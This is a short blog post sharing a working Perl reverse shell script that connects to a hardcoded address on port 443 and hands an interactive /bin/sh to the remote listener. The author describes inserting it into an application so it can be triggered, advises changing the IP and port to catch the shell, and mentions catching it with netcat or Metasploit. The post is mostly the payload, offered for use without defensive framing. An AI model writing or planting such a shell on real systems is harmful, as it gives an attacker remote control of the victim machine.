Perl Reverse Shell Script
- by Vince
-
in Blog
-
Hits: 5105
There are quite a few reverse shell examples available to you on the Internet. You can also find a large collection under /usr/share/webshells on the Kali Linux distro. That said, the other day, I need a small perl script to insert into an application which I could trigger. A one liner wouldn’t work and the more elaborate examples also wouldn’t work. I came up with the following from something I found in a search, hopefully you can put this to good use.
#!/usr/bin/perl -w
use Socket;
$i="192.168.1.50";
$p=443;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
};
You want to change the IP address and port to reflect where you want to catch this shell. You can catch it with netcat or Metasploit. With Metasploit, I’ve found that regardless of which account I get with my shell, the command “sessions –u #” (to upgrade the shell to meterpreter) will not work.
I’ll post how to get around that in a few days. :)